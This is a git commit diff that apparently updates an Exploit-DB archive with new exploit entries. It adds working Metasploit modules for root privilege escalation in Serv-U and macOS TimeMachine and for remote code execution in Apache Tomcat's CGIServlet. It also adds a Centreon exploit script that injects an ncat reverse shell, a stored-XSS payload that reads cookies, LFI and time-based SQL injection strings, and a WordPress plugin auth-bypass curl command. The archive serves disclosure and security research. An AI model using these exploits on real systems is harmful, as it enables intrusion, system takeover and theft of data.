Commit 33cb7f82 authored by Devon Kearns's avatar Devon Kearns

New upstream version 20190709

parent b8a11af7
......@@ -29,7 +29,7 @@
* $ id
* uid=500(raptor) gid=500(raptor) groups=500(raptor)
* $ gcc -g -c raptor_udf2.c
* $ gcc -g -shared -W1,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc
* $ gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc
* $ mysql -u root -p
* Enter password:
* [...]
......
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Local
Rank = ExcellentRanking
include Msf::Post::File
include Msf::Post::Linux::Kernel
include Msf::Post::Linux::Priv
include Msf::Post::Linux::System
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => 'Serv-U FTP Server prepareinstallation Privilege Escalation',
'Description' => %q{
This module attempts to gain root privileges on systems running
Serv-U FTP Server versions prior to 15.1.7.
The `Serv-U` executable is setuid `root`, and uses `ARGV[0]`
in a call to `system()`, without validation, when invoked with
the `-prepareinstallation` flag, resulting in command execution
with root privileges.
This module has been tested successfully on Serv-U FTP Server
version 15.1.6 (x64) on Debian 9.6 (x64).
},
'License' => MSF_LICENSE,
'Author' =>
[
'Guy Levin', # @va_start - Discovery and exploit
'bcoles' # Metasploit
],
'DisclosureDate' => '2019-06-05',
'References' =>
[
['CVE', '2019-12181'],
['EDB', '47009'],
['PACKETSTORM', '153333'],
['URL', 'https://github.com/guywhataguy/CVE-2019-12181'],
['URL', 'https://github.com/bcoles/local-exploits/tree/master/CVE-2019-12181'],
['URL', 'https://blog.vastart.dev/2019/06/cve-2019-12181-serv-u-exploit-writeup.html'],
['URL', 'https://documentation.solarwinds.com/en/success_center/servu/Content/Release_Notes/Servu_15-1-7_release_notes.htm'],
['URL', 'https://support.solarwinds.com/SuccessCenter/s/article/Serv-U-Potential-elevation-of-privileges-on-Linux-systems']
],
'Platform' => ['linux'],
'Arch' =>
[
ARCH_X86,
ARCH_X64,
ARCH_ARMLE,
ARCH_AARCH64,
ARCH_PPC,
ARCH_MIPSLE,
ARCH_MIPSBE
],
'SessionTypes' => ['shell', 'meterpreter'],
'Targets' => [['Auto', {}]],
'DefaultOptions' =>
{
'PrependSetresuid' => true,
'PrependSetresgid' => true,
'PrependFork' => true,
'WfsDelay' => 30
},
'DefaultTarget' => 0))
register_options [
OptString.new('SERVU_PATH', [true, 'Path to Serv-U executable', '/usr/local/Serv-U/Serv-U'])
]
register_advanced_options [
OptBool.new('ForceExploit', [false, 'Override check result', false]),
OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])
]
end
def servu_path
datastore['SERVU_PATH']
end
def base_dir
datastore['WritableDir'].to_s
end
def upload(path, data)
print_status "Writing '#{path}' (#{data.size} bytes) ..."
rm_f path
write_file path, data
register_file_for_cleanup path
end
def upload_and_chmodx(path, data)
upload path, data
chmod path
end
def check
unless command_exists? 'bash'
vprint_error 'bash shell is not available'
return CheckCode::Safe
end
vprint_good 'bash shell is available'
unless cmd_exec("test -x '#{servu_path}' && echo true").include? 'true'
vprint_error "#{servu_path} is not executable"
return CheckCode::Safe
end
vprint_good "#{servu_path} is executable"
unless setuid? servu_path
vprint_error "#{servu_path} is not setuid"
return CheckCode::Safe
end
vprint_good "#{servu_path} is setuid"
CheckCode::Detected
end
def exploit
unless check == CheckCode::Detected
unless datastore['ForceExploit']
fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'
end
print_warning 'Target does not appear to be vulnerable'
end
if is_root?
unless datastore['ForceExploit']
fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'
end
end
unless writable? base_dir
fail_with Failure::BadConfig, "#{base_dir} is not writable"
end
if nosuid? base_dir
fail_with Failure::BadConfig, "#{base_dir} is mounted nosuid"
end
payload_name = ".#{rand_text_alphanumeric 10..15}"
@payload_path = "#{base_dir}/#{payload_name}"
upload_and_chmodx @payload_path, generate_payload_exe
argv0 = %Q{\\";chown root #{@payload_path};chmod u+s #{@payload_path};chmod +x #{@payload_path}\\"}
cmd = %Q{bash -c 'exec -a "#{argv0}" #{servu_path} -prepareinstallation'}
vprint_status "Executing command: #{cmd}"
cmd_exec cmd
unless setuid? @payload_path
fail_with Failure::Unknown, 'Failed to set payload setuid root'
end
print_good "#{@payload_path} setuid root successfully"
print_status 'Executing payload...'
res = cmd_exec "#{@payload_path} &"
vprint_line res
end
def on_new_session(session)
if session.type.eql? 'meterpreter'
session.core.use 'stdapi' unless session.ext.aliases.include? 'stdapi'
session.fs.file.rm @payload_path
else
session.shell_command_token "rm -f '#{@payload_path}'"
end
ensure
super
end
end
\ No newline at end of file
......@@ -3,7 +3,6 @@
# Date: 6/29/2019
# Exploit Author: Joey Lane
# Vendor Homepage: https://www.cyberpowersystems.com
# Software Link: https://dl4jz3rbrsfum.cloudfront.net/software/ppbe340-linux-x86_64.sh
# Version: 3.4.0
# Tested on: Ubuntu 16.04
# CVE : Pending
......
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Local
Rank = ExcellentRanking
include Msf::Post::File
include Msf::Post::OSX::Priv
include Msf::Post::OSX::System
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => 'Mac OS X TimeMachine (tmdiagnose) Command Injection Privilege Escalation',
'Description' => %q{
This module exploits a command injection in TimeMachine on macOS <= 10.14.3 in
order to run a payload as root. The tmdiagnose binary on OSX <= 10.14.3 suffers
from a command injection vulnerability that can be exploited by creating a
specially crafted disk label.
The tmdiagnose binary uses awk to list every mounted volume, and composes
shell commands based on the volume labels. By creating a volume label with the
backtick character, we can have our own binary executed with root priviledges.
},
'License' => MSF_LICENSE,
'Author' => [
'CodeColorist', # Discovery and exploit
'timwr', # Metasploit module
],
'References' => [
['CVE', '2019-8513'],
['URL', 'https://medium.com/0xcc/rootpipe-reborn-part-i-cve-2019-8513-timemachine-root-command-injection-47e056b3cb43'],
['URL', 'https://support.apple.com/en-in/HT209600'],
['URL', 'https://github.com/ChiChou/sploits'],
],
'DefaultTarget' => 0,
'DefaultOptions' => { 'WfsDelay' => 300, 'PAYLOAD' => 'osx/x64/meterpreter/reverse_tcp' },
'Targets' => [
[ 'Mac OS X x64 (Native Payload)', { 'Arch' => ARCH_X64, 'Platform' => [ 'osx' ] } ],
[ 'Python payload', { 'Arch' => ARCH_PYTHON, 'Platform' => [ 'python' ] } ],
[ 'Command payload', { 'Arch' => ARCH_CMD, 'Platform' => [ 'unix' ] } ],
],
'DisclosureDate' => 'Apr 13 2019'))
register_advanced_options [
OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])
]
end
def upload_executable_file(filepath, filedata)
print_status("Uploading file: '#{filepath}'")
write_file(filepath, filedata)
chmod(filepath)
register_file_for_cleanup(filepath)
end
def check
version = Gem::Version.new(get_system_version)
if version >= Gem::Version.new('10.14.4')
CheckCode::Safe
else
CheckCode::Appears
end
end
def exploit
if check != CheckCode::Appears
fail_with Failure::NotVulnerable, 'Target is not vulnerable'
end
if is_root?
fail_with Failure::BadConfig, 'Session already has root privileges'
end
unless writable? datastore['WritableDir']
fail_with Failure::BadConfig, "#{datastore['WritableDir']} is not writable"
end
exploit_data = File.binread(File.join(Msf::Config.data_directory, "exploits", "CVE-2019-8513", "exploit" ))
if target['Arch'] == ARCH_X64
root_cmd = payload.encoded
else
root_cmd = payload.raw
if target['Arch'] == ARCH_PYTHON
root_cmd = "echo \"#{root_cmd}\" | python"
end
root_cmd = "CMD:#{root_cmd}"
end
if root_cmd.length > 1024
fail_with Failure::PayloadFailed, "Payload size (#{root_cmd.length}) exceeds space in payload placeholder"
end
placeholder_index = exploit_data.index('ROOT_PAYLOAD_PLACEHOLDER')
exploit_data[placeholder_index, root_cmd.length] = root_cmd
exploit_file = "#{datastore['WritableDir']}/.#{Rex::Text::rand_text_alpha_lower(6..12)}"
upload_executable_file(exploit_file, exploit_data)
print_status("Executing exploit '#{exploit_file}'")
result = cmd_exec(exploit_file)
print_status("Exploit result:\n#{result}")
end
end
\ No newline at end of file
# Exploit Title: Persistent XSS on Symantec DLP <= 15.5 MP1
# Date: 2019-06-21
# Exploit Author: Chapman Schleiss
# Vendor Homepage: https://www.symantec.com/
# Software Link: https://support.symantec.com/us/en/mysymantec.html
# Version: <= 15.5 MP1
# CVE : 2019-9701
# Advisory-URL: https://support.symantec.com/us/en/article.SYMSA1484.html
# Hot Fix: https://support.symantec.com/us/en/article.ALERT2664.html
Description
---------------
Persistent XSS via 'name' param at
/ProtectManager/enforce/admin/senderrecipientpatterns/list
Payload: ' oNmouseover=prompt(document.domain,document.cookie) )
Browser: Firefox 64, IE 11
Date Observed: 15 January 2019
Reproduction POST
-----------------
POST
/ProtectManager/enforce/admin/senderrecipientpatterns/recipient_patterns/update
HTTP/1.1
Host: [snip].com:8443
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:64.0)
Gecko/20100101 Firefox/64.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://
[snip].com:8443/ProtectManager/enforce/admin/senderrecipientpatterns/recipient_patterns/edit?id=41&version=30
Content-Type: application/x-www-form-urlencoded
Content-Length: 558
Connection: close
name=%27+oNmouseover%3Dprompt%28document.domain%2Cdocument.cookie%29+%29&description=some_text&userPatterns=test%
40test.com&ipAddresses=192.168.1.1&urlDomains=mail.company.com
&id=41&version=30
Reproduction GET
----------------
GET /ProtectManager/enforce/admin/senderrecipientpatterns/list HTTP/1.1
Host: [snip].com:8443
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:64.0)
Gecko/20100101 Firefox/64.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://
[snip].com:8443/ProtectManager/enforce/admin/senderrecipientpatterns/recipient_patterns/edit?id=41&version=30
Connection: close
Reproduction Response
---------------------
<div id="messages-section">
<div class="message-pane alert-pane">
<div class="alert-message">
<div class="yui3-g message-pane-scroll">
<div class="yui3-u-1-24 message-icon">
<img src="/ProtectManager/graphics/success_icon.gif" alt="Success" width="19" height="19" />
</div>
<div class="yui3-u-11-12 wrapping-text">
<div id="web-status-message-163" class="message-content"> Recipient pattern '' oNmouseover=prompt(document.domain,document.cookie) )' was saved successfully. </div>
</div>
<div class="yui3-u-1-24">
<div class="message-pane-actions">
<a href="#" class="message-back-to-element hidden action-icon">
<img src="/ProtectManager/graphics/general/scroll_back_16.png" alt="" title="Show affected object"/>
</a>
<a href="#" class="message-pane-close action-icon">
<img src="/ProtectManager/graphics/general/cancel_blue_16.png" alt="" title="Close message bar"/>
</a>
</div>
</div>
</div>
</div>
</div>
</div>
\ No newline at end of file
#!/usr/bin/python
'''
# Exploit Title: Centreon v19.04 authenticated Remote Code Execution
# Date: 28/06/2019
# Exploit Author: Askar (@mohammadaskar2)
# CVE : CVE-2019-13024
# Vendor Homepage: https://www.centreon.com/
# Software link: https://download.centreon.com
# Version: v19.04
# Tested on: CentOS 7.6 / PHP 5.4.16
'''
import requests
import sys
import warnings
from bs4 import BeautifulSoup
# turn off BeautifulSoup warnings
warnings.filterwarnings("ignore", category=UserWarning, module='bs4')
if len(sys.argv) != 6:
print(len(sys.argv))
print("[~] Usage : ./centreon-exploit.py url username password ip port")
exit()
url = sys.argv[1]
username = sys.argv[2]
password = sys.argv[3]
ip = sys.argv[4]
port = sys.argv[5]
request = requests.session()
print("[+] Retrieving CSRF token to submit the login form")
page = request.get(url+"/index.php")
html_content = page.text
soup = BeautifulSoup(html_content)
token = soup.findAll('input')[3].get("value")
login_info = {
"useralias": username,
"password": password,
"submitLogin": "Connect",
"centreon_token": token
}
login_request = request.post(url+"/index.php", login_info)
print("[+] Login token is : {0}".format(token))
if "Your credentials are incorrect." not in login_request.text:
print("[+] Logged In Sucssfully")
print("[+] Retrieving Poller token")
poller_configuration_page = url + "/main.get.php?p=60901"
get_poller_token = request.get(poller_configuration_page)
poller_html = get_poller_token.text
poller_soup = BeautifulSoup(poller_html)
poller_token = poller_soup.findAll('input')[24].get("value")
print("[+] Poller token is : {0}".format(poller_token))
payload_info = {
"name": "Central",
"ns_ip_address": "127.0.0.1",
# this value should be 1 always
"localhost[localhost]": "1",
"is_default[is_default]": "0",
"remote_id": "",
"ssh_port": "22",
"init_script": "centengine",
# this value contains the payload , you can change it as you want
"nagios_bin": "ncat -e /bin/bash {0} {1} #".format(ip, port),
"nagiostats_bin": "/usr/sbin/centenginestats",
"nagios_perfdata": "/var/log/centreon-engine/service-perfdata",
"centreonbroker_cfg_path": "/etc/centreon-broker",
"centreonbroker_module_path": "/usr/share/centreon/lib/centreon-broker",
"centreonbroker_logs_path": "",
"centreonconnector_path": "/usr/lib64/centreon-connector",
"init_script_centreontrapd": "centreontrapd",
"snmp_trapd_path_conf": "/etc/snmp/centreon_traps/",
"ns_activate[ns_activate]": "1",
"submitC": "Save",
"id": "1",
"o": "c",
"centreon_token": poller_token,
}
send_payload = request.post(poller_configuration_page, payload_info)
print("[+] Injecting Done, triggering the payload")
print("[+] Check your netcat listener !")
generate_xml_page = url + "/include/configuration/configGenerate/xml/generateFiles.php"
xml_page_data = {
"poller": "1",
"debug": "true",
"generate": "true",
}
request.post(generate_xml_page, xml_page_data)
else:
print("[-] Wrong credentials")
exit()
\ No newline at end of file
===========================================================================================
# Exploit Title: Karenderia CMS 5.1 - LFI Vuln.
# Dork: N/A
# Date: 04-07-2019
# Exploit Author: Mehmet EMIROGLU
# Software Link:
https://codecanyon.net/item/karenderia-multiple-restaurant-system/9118694
# Version: v5.3
# Category: Webapps
# Tested on: Wamp64, Windows
# CVE: N/A
# Software Description: Karenderia Multiple Restaurant System is a
restaurant food ordering and restaurant membership system.
===========================================================================================
# POC - Frame Inj
# Parameters : f
# Attack Pattern :
%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fproc%2fversion
# GET Method :
http://localhost/kmrs/exportmanager/ajax/getfiles?f=/../../../../../../../../../../proc/version
===========================================================================================
\ No newline at end of file
===========================================================================================
# Exploit Title: Karenderia CMS 5.3 - Multiple SQL Vuln.
# Dork: N/A
# Date: 05-07-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: buyer2@codemywebapps.com
# Software Link: https://codecanyon.net/item/karenderia-multiple-restaurant-system/9118694
# Version: v5.3
# Category: Webapps
# Tested on: Wamp64, Windows
# CVE: N/A
# Software Description: Karenderia Multiple Restaurant System is a
restaurant food ordering and restaurant membership system.
===========================================================================================
# POC - SQLi (Blind)
# Parameters : street-name
# Attack Pattern :
1+%2b+((SELECT+1+FROM+(SELECT+SLEEP(25))A))%2f*%27XOR(((SELECT+1+FROM+(SELECT+SLEEP(25))A)))OR%27%7c%22XOR(((SELECT+1+FROM+(SELECT+SLEEP(25))A)))OR%22*%2f
# GET Method :
http://localhost/kmrs/searcharea?st=Los%20Angeles,%20CA,%20United%20States&street-name=1%20+%20((SELECT%201%20FROM%20(SELECT%20SLEEP(25))A))/*'XOR(((SELECT%201%20FROM%20(SELECT%20SLEEP(25))A)))OR'|
"XOR(((SELECT%201%20FROM%20(SELECT%20SLEEP(25))A)))OR"*/
===========================================================================================
###########################################################################################
===========================================================================================
# Exploit Title: Karenderia CMS 5.3 - Multiple SQL Vuln.
# Dork: N/A
# Date: 05-07-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: buyer2@codemywebapps.com
# Software Link: https://codecanyon.net/item/karenderia-multiple-restaurant-system/9118694
# Version: v5.3
# Category: Webapps
# Tested on: Wamp64, Windows
# CVE: N/A
# Software Description: Karenderia Multiple Restaurant System is a
restaurant food ordering and restaurant membership system.
===========================================================================================
# POC - SQLi (Blind)
# Parameters : category
# Attack Pattern :
1+%2b+((SELECT+1+FROM+(SELECT+SLEEP(25))A))%2f*%27XOR(((SELECT+1+FROM+(SELECT+SLEEP(25))A)))OR%27%7c%22XOR(((SELECT+1+FROM+(SELECT+SLEEP(25))A)))OR%22*%2f
# GET Method :
http://localhost/kmrs/store/cuisine/?category=1%20+%20((SELECT%201%20FROM%20(SELECT%20SLEEP(25))A))/*'XOR(((SELECT%201%20FROM%20(SELECT%20SLEEP(25))A)))OR'|
"XOR(((SELECT%201%20FROM%20(SELECT%20SLEEP(25))A)))OR"*/&page=2
===========================================================================================
\ No newline at end of file
Exploit Title: WP Like Button 1.6.0 - Auth Bypass
Date: 05-Jul-19
Exploit Author: Benjamin Lim
Vendor Homepage: http://www.crudlab.com
Software Link: https://wordpress.org/plugins/wp-like-button/
Version: 1.6.0
CVE : CVE-2019-13344
1. Product & Service Introduction:
WP Like button allows you to add Facebook like button on your wordpress
blog. You can also add Share button along with Like button or can add
recommend button. As of now, the plugin has been downloaded 129,089 times
and has 10,000+ active installs.
2. Technical Details & Description:
Authentication Bypass vulnerability in the WP Like Button (Free) plugin
version 1.6.0 allows unauthenticated attackers to change the settings of
the plugin. The contains() function in wp_like_button.php did not check if
the current request is made by an authorized user, thus allowing any
unauthenticated user to successfully update the settings of the plugin.
3. Proof of Concept (PoC):
For example, the curl command below allows an attacker to change the
each_page_url parameter to https://hijack.com. This allows the attacker to
hijack Facebook likes.
curl -k -i --raw -X POST -d
"page=facebook-like-button&site_url=https%%3A%%2F%%2Flocalhost%%2Fwp&display[]=1&display[]=2&display[]=4&display[]=16&mobile=1&fb_app_id=&fb_app_admin=&kd=0&fblb_default_upload_image=&code_snippet=%%3C%%3Fphp+echo+fb_like_button()%%3B+%%3F%%3E&beforeafter=before&eachpage=url&each_page_url=
https://hijack.com&language=en_US&width=65&position=center&layout=box_count&action=like&color=light&btn_size=small&faces=1&share=1&update_fblb="
"https://localhost/wp/wp-admin/admin.php?page=facebook-like-button&edit=1"
-H "Content-Type: application/x-www-form-urlencoded"
4. Mitigation
No update has been released by the vendor. Users are advised to switch to a
different plugin.
5. Disclosure Timeline
2019/06/24 Vendor contacted regarding vulnerability in v1.5.0 (crudlab@gmail.com)
2019/06/30 Second email sent to vendor (crudlab@gmail.com)
2019/07/02 Vendor released v1.6.0 update. Vulnerability still exists.
Vendor did not acknowledge any emails.
2018/07/03 Third email sent to vendor's billing email domain (info@purelogics.net)
2018/07/05 Public disclosure
6. Credits & Authors:
Benjamin Lim - [https://limbenjamin.com]
\ No newline at end of file
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager
def initialize(info={})
super(update_info(info,
'Name' => 'Apache Tomcat CGIServlet enableCmdLineArguments Vulnerability',
'Description' => %q{
This module exploits a vulnerability in Apache Tomcat's CGIServlet component. When the
enableCmdLineArguments setting is set to true, a remote user can abuse this to execute
system commands, and gain remote code execution.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Yakov Shafranovich', # Original discovery
'sinn3r' # Metasploit module
],
'Platform' => 'win',
'Arch' => [ARCH_X86, ARCH_X64],
'Targets' =>
[
[ 'Apache Tomcat 9.0 or prior for Windows', { } ]
],
'References' =>
[
['CVE', '2019-0232'],
['URL', 'https://wwws.nightwatchcybersecurity.com/2019/04/30/remote-code-execution-rce-in-cgi-servlet-apache-tomcat-on-windows-cve-2019-0232/'],
['URL', 'https://blog.trendmicro.com/trendlabs-security-intelligence/uncovering-cve-2019-0232-a-remote-code-execution-vulnerability-in-apache-tomcat/']
],
'Notes' =>
{
'SideEffects' => [ IOC_IN_LOGS, ARTIFACTS_ON_DISK ],
'Reliability' => [ REPEATABLE_SESSION ],
'Stability' => [ CRASH_SAFE ]
},
'CmdStagerFlavor' => 'vbs',
'DefaultOptions' =>
{
'RPORT' => 8080
},
'Privileged' => false,
'DisclosureDate' => 'Apr 10 2019', # Date of public advisory issued by the vendor
'DefaultTarget' => 0
))
register_options(
[
OptString.new('TARGETURI', [true, 'The URI path to CGI script', '/'])
])
register_advanced_options(
[
OptBool.new('ForceExploit', [false, 'Override check result', false])
])
deregister_options('SRVHOST', 'SRVPORT', 'URIPATH')
end
def check
sig = Rex::Text.rand_text_alpha(10)
uri = normalize_uri(target_uri.path)
uri << "?&echo+#{sig}"
res = send_request_cgi({
'method' => 'GET',
'uri' => uri
})
unless res
vprint_error('No Response from server')
return CheckCode::Unknown
end
if res.body.include?(sig)
return CheckCode::Vulnerable
end
CheckCode::Safe
end
def execute_command(cmd, opts={})
# Our command stager assumes we have access to environment variables.
# We don't necessarily have that, so we have to modify cscript to a full path.
cmd.gsub!('cscript', 'C:\\Windows\\System32\\cscript.exe')
uri = normalize_uri(target_uri.path)
uri << "?&#{CGI.escape(cmd)}"
res = send_request_cgi({
'method' => 'GET',
'uri' => uri
})
unless res
fail_with(Failure::Unreachable, 'No response from server')
end
unless res.code == 200
fail_with(Failure::Unknown, "Unexpected server response: #{res.code}")
end
end
# it seems we don't really have a way to retrieve the filenames from the VBS command stager,
# so we need to rely on the user to cleanup the files.
def on_new_session(cli)
print_warning('Make sure to manually cleanup the exe generated by the exploit')
super
end
def exploit
print_status("Checking if #{rhost} is vulnerable")
unless check == CheckCode::Vulnerable
unless datastore['ForceExploit']
fail_with(Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.')
end
print_warning('Target does not appear to be vulnerable.')
end
print_status("#{rhost} seems vulnerable, what a good day.")
execute_cmdstager(flavor: :vbs, temp: '.', linemax: 7000)
end
end
\ No newline at end of file
This source diff could not be displayed because it is too large. You can view the blob instead.
......@@ -10563,6 +10563,8 @@ id,file,description,date,author,type,platform,port
47009,exploits/linux/local/47009.c,"Serv-U FTP Server < 15.1.7 - Local Privilege Escalation",2019-06-18,"Guy Levin",local,linux,
47012,exploits/windows/local/47012.py,"Tuneclone 2.20 - Local SEH Buffer Overflow",2019-06-20,Achilles,local,windows,